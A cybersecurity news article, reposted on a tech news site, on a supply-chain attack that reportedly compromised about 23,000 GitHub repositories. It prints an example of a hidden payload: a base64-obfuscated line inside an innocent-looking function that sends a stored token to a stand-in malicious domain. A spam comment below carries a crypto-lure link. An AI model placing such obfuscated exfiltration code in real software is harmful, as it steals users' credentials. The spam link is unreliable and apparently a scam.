Close Menu
RoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech Innovations
  • Home
  • AI
  • Crypto
  • Cybersecurity
  • IT
  • Energy
  • Robotics
  • TechCrunch
  • Technology
What's Hot

Qualcomm to launch data center processors that link to Nvidia chips

May 19, 2025

Crypto elite increasingly worried about their personal safety

May 18, 2025

Grok says it’s ‘skeptical’ about Holocaust death toll, then blames ‘programming error’

May 18, 2025
Facebook X (Twitter) Instagram
Trending
  • Qualcomm to launch data center processors that link to Nvidia chips
  • Crypto elite increasingly worried about their personal safety
  • Grok says it’s ‘skeptical’ about Holocaust death toll, then blames ‘programming error’
  • Heybike’s Alpha step-through e-bike is an affordable, all-terrain dreamboat
  • U.S. lawmakers have concerns about Apple-Alibaba deal
  • Trump coin dinner to include mostly non-Americans based on top holders
  • How Silicon Valley’s influence in Washington benefits the tech elite
  • Thousands of people have embarked on a virtual road trip via Google Street View
  • Home
  • About Us
  • Advertise
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
Facebook X (Twitter) Instagram
RoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech InnovationsRoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech Innovations
Monday, May 19
  • Home
  • AI
  • Crypto
  • Cybersecurity
  • IT
  • Energy
  • Robotics
  • TechCrunch
  • Technology
RoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech Innovations
Home » 23,000 GitHub Repositories Targeted In Supply Chain Attack

23,000 GitHub Repositories Targeted In Supply Chain Attack

GTBy GTMarch 17, 2025 Cybersecurity 1 Comment2 Mins Read
Share
Facebook Twitter LinkedIn Pinterest Email


23,000 GitHub Repositories Targeted In Supply Chain Attack

In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised in what security experts are calling one of the largest supply chain attacks to date.

The attackers exploited vulnerabilities in the software development pipeline to potentially distribute malicious code to thousands of downstream applications and services.

GitHub, a platform hosting over 200 million repositories and used by more than 100 million developers worldwide, confirmed the attack after several popular open-source projects reported unauthorized commits to their codebases.

These repositories collectively serve as dependencies for millions of applications, amplifying the potential impact of this security incident.

StepSecurity Security researchers identified the attack pattern after noticing suspicious commit activities across multiple unrelated repositories.

The attack primarily targeted repositories with high download counts and those used as dependencies in enterprise applications, revealing a calculated strategy to maximize impact.

Technical analysis revealed the attackers used a sophisticated approach to compromise maintainer accounts through a combination of phishing attacks and exploiting token leaks.

Once gaining access, they injected malicious code snippets designed to be difficult to detect during routine code reviews.

The injected code typically contained obfuscated payloads similar to the example below:-

function validate(input) {
// Legitimate-looking function
let result = checkFormat(input);

// Malicious payload hidden within normal code
setTimeout(() => {
new Function(atob(“ZmV0Y2goJ2h0dHBzOi8vbWFsaWNpb3VzLWRvbWFpbi5jb20vYycsIHttZXRob2Q6ICdQT1NUJywgYm9keTogSlNPTi5zdHJpbmdpZnkoe2Q6IGxvY2FsU3RvcmFnZS5nZXRJdGVtKCd0b2tlbicpfSl9KTs=”))();
}, 10000);

return result;
}

Malicious commit (Source – StepSecurity)

Mitigation Efforts

Project maintainers are advised to audit recent commits, especially those modifying package configuration files or dependency declarations.

GitHub has temporarily restricted access to the affected repositories while working with maintainers to revert malicious changes and implement additional security measures.

Security experts recommend users check their dependencies urgently and update to verified versions.

Organizations should review their software supply chain security practices and implement automated scanning tools to detect potential compromises before they impact production systems.

Workflow (Source – StepSecurity)

The attack shows the growing importance of securing the software supply chain, as a single compromised dependency can affect thousands of downstream applications and expose sensitive data across numerous organizations.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.



Source link

GT
  • Website

Keep Reading

Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024

Hackers Launching Cyber Attacks Targeting Multiple Schools & Universities in New Mexico

Over 90% of Cybersecurity Leaders Worldwide Encountered Cyberattacks Targeting Cloud Environments

China Reportedly Admits Their Role in Cyber Attacks Against U.S. Infrastructure

APT32 Hackers Weaponizing GitHub to Attack Cybersecurity Professionals & Enterprises

10 Best IT Asset Management Tools

View 1 Comment

1 Comment

  1. 🔈 + 1.181672 BTC.NEXT - https://graph.org/Message--685-03-25?hs=fae67d1b441b4d8a5b4ccbd36140374b& 🔈 on April 3, 2025 3:51 pm

    98x5bk

    Reply
Leave A Reply Cancel Reply

Editors Picks

Qualcomm to launch data center processors that link to Nvidia chips

May 19, 2025

Grok’s ‘white genocide’ responses show gen AI tampered with ‘at will’

May 17, 2025

Tech IPO market is finally showing signs of life

May 16, 2025

AI travel agents planning future trip far beyond ‘assistant’ status

May 16, 2025
Latest Posts

Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024

May 15, 2025

Hackers Launching Cyber Attacks Targeting Multiple Schools & Universities in New Mexico

May 6, 2025

Over 90% of Cybersecurity Leaders Worldwide Encountered Cyberattacks Targeting Cloud Environments

May 1, 2025

Subscribe to News

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

Welcome to RoboNewsWire, your trusted source for cutting-edge news and insights in the world of technology. We are dedicated to providing timely and accurate information on the most important trends shaping the future across multiple sectors. Our mission is to keep you informed and ahead of the curve with deep dives, expert analysis, and the latest updates in key industries that are transforming the world.

Subscribe to Updates

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

Facebook X (Twitter) Instagram
  • Home
  • About Us
  • Advertise
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
© 2025 Robonewswire. Designed by robonewswire.

Type above and press Enter to search. Press Esc to cancel.

STEAM Education

At FutureBots, we believe the future belongs to creators, thinkers, and problem-solvers. That’s why we’ve made it our mission to provide high-quality STEM products designed to inspire curiosity, spark innovation, and empower learners of all ages to shape the world through robotics and technology.